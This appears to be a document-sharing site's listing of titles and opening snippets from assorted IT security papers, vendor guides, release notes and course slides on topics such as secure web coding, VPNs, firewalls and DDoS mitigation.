Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
BlackBerry Enterprise Service 10. Secure Work Space for ios and Android Version: 10.1.1. Security Note
BlackBerry Enterprise Service 10 Secure Work Space for ios and Android Version: 10.1.1 Security Note Published: 2013-06-21 SWD-20130621110651069 Contents 1 About this guide...4 2 What is BlackBerry Enterprise
Architecture and Data Flow Overview. BlackBerry Enterprise Service 10 721-08877-123 Version: 10.2. Quick Reference
Architecture and Data Flow Overview BlackBerry Enterprise Service 10 721-08877-123 Version: Quick Reference Published: 2013-11-28 SWD-20131128130321045 Contents Key components of BlackBerry Enterprise
FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
JavaScript By: A. Mousavi & P. Broomhead SERG, School of Engineering Design, Brunel University, UK
Programming for Digital Media EE1707 JavaScript By: A. Mousavi & P. Broomhead SERG, School of Engineering Design, Brunel University, UK 1 References and Sources 1. DOM Scripting, Web Design with JavaScript
Last update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
The Weakest Link: Mitigating Web Application Vulnerabilities. webscurity White Paper. webscurity Inc. Minneapolis, Minnesota USA
The Weakest Link: Mitigating Web Application Vulnerabilities webscurity White Paper webscurity Inc. Minneapolis, Minnesota USA January 25, 2007 Contents Executive Summary...3 Introduction...4 Target Audience...4
CMPT 471 Networking II
CMPT 471 Networking II Firewalls Janice Regan, 2006-2013 1 Security When is a computer secure When the data and software on the computer are available on demand only to those people who should have access
Kids and the Internet - Parental Control made easy. Christian Donner
Kids and the Internet - Parental Control made easy Christian Donner Setting the bar What is your level of experience with computers and the internet? What are you expecting to take away from this class?
WatchGuard SSL v3.2 Update 1 Release Notes. Introduction. Windows 8 and 64-bit Internet Explorer Support. Supported Devices SSL 100 and 560
WatchGuard SSL v3.2 Update 1 Release Notes Supported Devices SSL 100 and 560 WatchGuard SSL OS Build 445469 Revision Date 3 April 2014 Introduction WatchGuard is pleased to announce the release of WatchGuard
Fortigate SSL VPN 4 With PINsafe Installation Notes
Fortigate SSL VPN 4 With PINsafe Installation Notes Table of Contents Fortigate SSL VPN 4 With PINsafe Installation Notes... 1 1. Introduction... 2 2. Overview... 2 2.1. Prerequisites... 2 2.2. Baseline...
[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks
TLP: GREEN Issue Date: 1.12.16 Threat Advisory: Continuous Uptick in SEO Attacks Risk Factor High The Akamai Threat Research Team has identified a highly sophisticated Search Engine Optimization (SEO)
http://alice.teaparty.wonderland.com:23054/dormouse/bio.htm
Client/Server paradigm As we know, the World Wide Web is accessed thru the use of a Web Browser, more technically known as a Web Client. 1 A Web Client makes requests of a Web Server 2, which is software
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
DDoS Protecion Total AnnihilationD. DDoS Mitigation Lab
DDoS Protecion Total AnnihilationD A Industry body formed to foster synergy among stakeholders to promote advancement in DDoS defense knowledge. Independent academic R&D division of Nexusguard building
Recent Advances in Web Application Security
Recent Advances in Web Application Security Author: Neelay S Shah Principal Security Consultant Foundstone Professional Services Table of Contents Introduction 3 Content Security Policy 3 Best Practices
